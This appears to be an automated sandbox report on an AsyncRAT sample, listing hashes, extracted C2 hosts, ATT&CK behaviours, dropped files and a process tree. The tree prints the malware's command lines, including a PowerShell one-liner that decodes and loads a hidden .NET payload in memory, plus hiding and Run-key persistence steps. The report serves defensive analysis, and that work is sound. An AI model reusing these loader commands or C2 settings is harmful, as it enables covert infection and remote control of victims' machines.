asyncrat | 47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7

Analysis

max time kernel
129s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
06-08-2024 14:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe
Size

45KB
MD5

3b86abe4c79286ed06965c268968c03d
SHA1

64afe64ee719aa3526023a5f7edacd44db21bde4
SHA256

47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7
SHA512

68f108646437fd72622cd1f719b2092b095e67500502981c4b605c64acaa38c12f46a82e47318b405137e5112ff82ccb51bfbb953b67fd3d1e9a5de1c2874483
SSDEEP

768:juAKNTR4ydbWUnrGJmo2q7zL5P02FUFdxYkk8PIWzjbAgX3ih8QNd4sqyVUbGKZ9:juAKNTRZ22oLDmWBW3bnXSh8QN6sqEWh

Score

10^/10

asyncrat underground-cheat.com discovery evasion execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

blue.o7lab.me:7777

server.underground-cheat.xyz:7777

Mutex

dtDtRWyW1m1g

Attributes

delay
3
install
false
install_file
$77WinUpdate.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

5.0.5

Botnet

underground-cheat.com

server.underground-cheat.xyz:4449

bluedns.o7lab.me:4449

Mutex

underground-cheat.comunderground-cheat.com

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2548	attrib.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	avnhbe.cmd.Jla
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	pure.exe

Executes dropped EXE 2 IoCs

pid	Process
976	avnhbe.cmd.Jla
3516	pure.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dehfdpa = "C:\\Users\\Admin\\AppData\\Local\\Dehfdpa.cmd"	avnhbe.cmd.Jla
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ekxyykv = "C:\\Users\\Admin\\AppData\\Local\\Ekxyykv.exe"	pure.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
4036	powershell.exe
1972	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 976 set thread context of 8	976	avnhbe.cmd.Jla	100

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pure.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	avnhbe.cmd.Jla
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3012	ipconfig.exe
1912	ipconfig.exe
4908	ipconfig.exe
3660	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
4036	powershell.exe
4464	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe
4036	powershell.exe
976	avnhbe.cmd.Jla
976	avnhbe.cmd.Jla
976	avnhbe.cmd.Jla
1972	powershell.exe
1972	powershell.exe
8	RegAsm.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe
3516	pure.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4464	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	976	avnhbe.cmd.Jla
Token: SeDebugPrivilege	976	avnhbe.cmd.Jla
Token: SeDebugPrivilege	8	RegAsm.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	3516	pure.exe
Token: SeDebugPrivilege	3516	pure.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4464 wrote to memory of 640	4464	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe	87
PID 4464 wrote to memory of 640	4464	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe	87
PID 4464 wrote to memory of 640	4464	47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe	87
PID 640 wrote to memory of 4036	640	cmd.exe	89
PID 640 wrote to memory of 4036	640	cmd.exe	89
PID 640 wrote to memory of 4036	640	cmd.exe	89
PID 4036 wrote to memory of 2776	4036	powershell.exe	90
PID 4036 wrote to memory of 2776	4036	powershell.exe	90
PID 4036 wrote to memory of 2776	4036	powershell.exe	90
PID 2776 wrote to memory of 3660	2776	cmd.exe	92
PID 2776 wrote to memory of 3660	2776	cmd.exe	92
PID 2776 wrote to memory of 3660	2776	cmd.exe	92
PID 2776 wrote to memory of 4360	2776	cmd.exe	93
PID 2776 wrote to memory of 4360	2776	cmd.exe	93
PID 2776 wrote to memory of 4360	2776	cmd.exe	93
PID 2776 wrote to memory of 2548	2776	cmd.exe	94
PID 2776 wrote to memory of 2548	2776	cmd.exe	94
PID 2776 wrote to memory of 2548	2776	cmd.exe	94
PID 2776 wrote to memory of 976	2776	cmd.exe	95
PID 2776 wrote to memory of 976	2776	cmd.exe	95
PID 2776 wrote to memory of 976	2776	cmd.exe	95
PID 976 wrote to memory of 908	976	avnhbe.cmd.Jla	96
PID 976 wrote to memory of 908	976	avnhbe.cmd.Jla	96
PID 976 wrote to memory of 908	976	avnhbe.cmd.Jla	96
PID 908 wrote to memory of 3012	908	cmd.exe	98
PID 908 wrote to memory of 3012	908	cmd.exe	98
PID 908 wrote to memory of 3012	908	cmd.exe	98
PID 976 wrote to memory of 8	976	avnhbe.cmd.Jla	100
PID 976 wrote to memory of 8	976	avnhbe.cmd.Jla	100
PID 976 wrote to memory of 8	976	avnhbe.cmd.Jla	100
PID 976 wrote to memory of 8	976	avnhbe.cmd.Jla	100
PID 976 wrote to memory of 8	976	avnhbe.cmd.Jla	100
PID 976 wrote to memory of 8	976	avnhbe.cmd.Jla	100
PID 976 wrote to memory of 8	976	avnhbe.cmd.Jla	100
PID 976 wrote to memory of 8	976	avnhbe.cmd.Jla	100
PID 976 wrote to memory of 720	976	avnhbe.cmd.Jla	101
PID 976 wrote to memory of 720	976	avnhbe.cmd.Jla	101
PID 976 wrote to memory of 720	976	avnhbe.cmd.Jla	101
PID 720 wrote to memory of 1912	720	cmd.exe	103
PID 720 wrote to memory of 1912	720	cmd.exe	103
PID 720 wrote to memory of 1912	720	cmd.exe	103
PID 8 wrote to memory of 2800	8	RegAsm.exe	106
PID 8 wrote to memory of 2800	8	RegAsm.exe	106
PID 8 wrote to memory of 2800	8	RegAsm.exe	106
PID 2800 wrote to memory of 1972	2800	cmd.exe	108
PID 2800 wrote to memory of 1972	2800	cmd.exe	108
PID 2800 wrote to memory of 1972	2800	cmd.exe	108
PID 1972 wrote to memory of 3516	1972	powershell.exe	109
PID 1972 wrote to memory of 3516	1972	powershell.exe	109
PID 1972 wrote to memory of 3516	1972	powershell.exe	109
PID 3516 wrote to memory of 2308	3516	pure.exe	111
PID 3516 wrote to memory of 2308	3516	pure.exe	111
PID 3516 wrote to memory of 2308	3516	pure.exe	111
PID 2308 wrote to memory of 4908	2308	cmd.exe	113
PID 2308 wrote to memory of 4908	2308	cmd.exe	113
PID 2308 wrote to memory of 4908	2308	cmd.exe	113
PID 3516 wrote to memory of 4784	3516	pure.exe	114
PID 3516 wrote to memory of 4784	3516	pure.exe	114
PID 3516 wrote to memory of 4784	3516	pure.exe	114
PID 3516 wrote to memory of 4784	3516	pure.exe	114
PID 3516 wrote to memory of 3412	3516	pure.exe	115
PID 3516 wrote to memory of 3412	3516	pure.exe	115
PID 3516 wrote to memory of 3412	3516	pure.exe	115
PID 3516 wrote to memory of 3412	3516	pure.exe	115

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2548	attrib.exe

C:\Users\Admin\AppData\Local\Temp\47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe
"C:\Users\Admin\AppData\Local\Temp\47a46de105177d826cbda74051f7f9d7bb95ed079c2e636743f9f04ad8c6c4a7.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4464
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\avnhbe.cmd"' & exit
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:640
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\avnhbe.cmd"'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4036
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avnhbe.cmd" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2776
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3660
    - - C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\avnhbe.cmd.Jla
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:4360
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h C:\Users\Admin\AppData\Local\Temp\avnhbe.cmd.Jla
        5⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2548
    - - C:\Users\Admin\AppData\Local\Temp\avnhbe.cmd.Jla
        
        C:\Users\Admin\AppData\Local\Temp\avnhbe.cmd.Jla -WindowStyle hidden -command "$Fywwr = get-content 'C:\Users\Admin\AppData\Local\Temp\avnhbe.cmd' | Select-Object -Last 1; $Oidbnh = [System.Convert]::FromBase64String($Fywwr);$Gpldsatvv = New-Object System.IO.MemoryStream( , $Oidbnh );$Vhfdab = New-Object System.IO.MemoryStream;$Phmdkmi = New-Object System.IO.Compression.GzipStream $Gpldsatvv, ([IO.Compression.CompressionMode]::Decompress);$Phmdkmi.CopyTo( $Vhfdab );$Phmdkmi.Close();$Gpldsatvv.Close();[byte[]] $Oidbnh = $Vhfdab.ToArray();[Array]::Reverse($Oidbnh); $Jcglv = [System.Threading.Thread]::GetDomain().Load($Oidbnh); $Jfbubqgvmqz = $Jcglv.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Jfbubqgvmqz.DeclaringType, $Jfbubqgvmqz.Name).DynamicInvoke() | Out-Null"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:976
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /release
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:908
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:3012
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:8
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pure.exe"' & exit
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pure.exe"'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\pure.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pure.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3516
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /release
        10⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2308
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        11⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:4908
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:4784
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:3412
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:5020
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:4384
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:1900
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:3328
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:1772
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:2512
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:2612
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:1508
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /renew
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:3392
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /renew
        11⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:3660
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /renew
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:720
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /renew
        7⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:1912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
5315900105942deb090a358a315b06fe

SHA1
22fe5d2e1617c31afbafb91c117508d41ef0ce44

SHA256
e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7

SHA512
77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
f40ace90fd55c73fac5394c955b4548c

SHA1
ed017b6044a137bbf2118e38d6108e6994056af2

SHA256
fd1eb3893dcb2d38d97b882a4d701f6c9bd72eb62b12b84beb3d277956148a65

SHA512
5b09918121cb2900e42ef4d66c58711872817e027cc8bc6b8f9e30596c1a61afe98dce402ca72e6592792c05eb053ffedef911152a1d858c9cc8d1c7ca3ad6cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cvnwsoix.ftr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\avnhbe.cmd

Filesize
1.2MB

MD5
b5e5e096bc15d44c8a013699e1a3dd13

SHA1
ce162f58e3a72e414089008db282e22435acf21f

SHA256
64635af7d3e0bab77a46c403711a6587ea1e722bba28303355860712184de91b

SHA512
bf7ab978fc19525eb6bc9ed6faf76b008feaa357e755c9cf67c3545bb867e0b0b6930d061cf138b1adf9345cbbb118734d40ef0096c38c636bce400f55ada556

Download Submit
C:\Users\Admin\AppData\Local\Temp\avnhbe.cmd.Jla

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\pure.exe

Filesize
1.5MB

MD5
675d5f4f8c0a9c2bd46b8ee34db2ac04

SHA1
a372e425e669936d174914680f46d30540d3706c

SHA256
ceda1404b09b12e5c59e28d23d0f86df547ed25de42ed74742c91cafe8fdf70f

SHA512
b9471dd7279a7de5df4547304938b53ce4ff56d373716fb065af8831192d592e1e97e11ed4509c61a80f39a602644cf241e09056f39505b7e64f9fe7aec934c2

Download Submit
memory/8-2158-0x0000000002550000-0x00000000025B4000-memory.dmp

Filesize
400KB

Download
memory/8-1101-0x00000000054B0000-0x00000000054BE000-memory.dmp

Filesize
56KB

Download
memory/8-1100-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/976-58-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-86-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-1096-0x0000000008390000-0x00000000083E4000-memory.dmp

Filesize
336KB

Download
memory/976-1091-0x00000000077A0000-0x0000000007832000-memory.dmp

Filesize
584KB

Download
memory/976-1090-0x00000000076B0000-0x00000000076FC000-memory.dmp

Filesize
304KB

Download
memory/976-1089-0x0000000007600000-0x000000000765E000-memory.dmp

Filesize
376KB

Download
memory/976-72-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-96-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-55-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-57-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-60-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-62-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-64-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-66-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-70-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-74-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-50-0x0000000008510000-0x0000000008B8A000-memory.dmp

Filesize
6.5MB

Download
memory/976-51-0x0000000007330000-0x000000000741A000-memory.dmp

Filesize
936KB

Download
memory/976-52-0x0000000007520000-0x00000000075FC000-memory.dmp

Filesize
880KB

Download
memory/976-53-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-68-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-116-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-114-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-112-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-111-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-108-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-106-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-104-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-102-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-100-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-98-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-94-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-92-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-90-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-88-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-76-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-84-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-82-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-80-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/976-78-0x0000000007520000-0x00000000075F6000-memory.dmp

Filesize
856KB

Download
memory/1972-1113-0x0000000006430000-0x000000000647C000-memory.dmp

Filesize
304KB

Download
memory/3516-2157-0x0000000005C40000-0x0000000005D44000-memory.dmp

Filesize
1.0MB

Download
memory/3516-1120-0x0000000005870000-0x00000000059F2000-memory.dmp

Filesize
1.5MB

Download
memory/3516-1119-0x00000000056F0000-0x0000000005872000-memory.dmp

Filesize
1.5MB

Download
memory/3516-1118-0x0000000000B80000-0x0000000000D0C000-memory.dmp

Filesize
1.5MB

Download
memory/4036-14-0x00000000060E0000-0x0000000006102000-memory.dmp

Filesize
136KB

Download
memory/4036-30-0x0000000006E00000-0x0000000006E22000-memory.dmp

Filesize
136KB

Download
memory/4036-34-0x0000000074670000-0x0000000074E20000-memory.dmp

Filesize
7.7MB

Download
memory/4036-28-0x0000000007A90000-0x0000000007B26000-memory.dmp

Filesize
600KB

Download
memory/4036-27-0x0000000006910000-0x000000000695C000-memory.dmp

Filesize
304KB

Download
memory/4036-26-0x00000000068C0000-0x00000000068DE000-memory.dmp

Filesize
120KB

Download
memory/4036-25-0x0000000006560000-0x00000000068B4000-memory.dmp

Filesize
3.3MB

Download
memory/4036-24-0x0000000006180000-0x00000000061E6000-memory.dmp

Filesize
408KB

Download
memory/4036-12-0x0000000005A70000-0x0000000006098000-memory.dmp

Filesize
6.2MB

Download
memory/4036-11-0x0000000074670000-0x0000000074E20000-memory.dmp

Filesize
7.7MB

Download
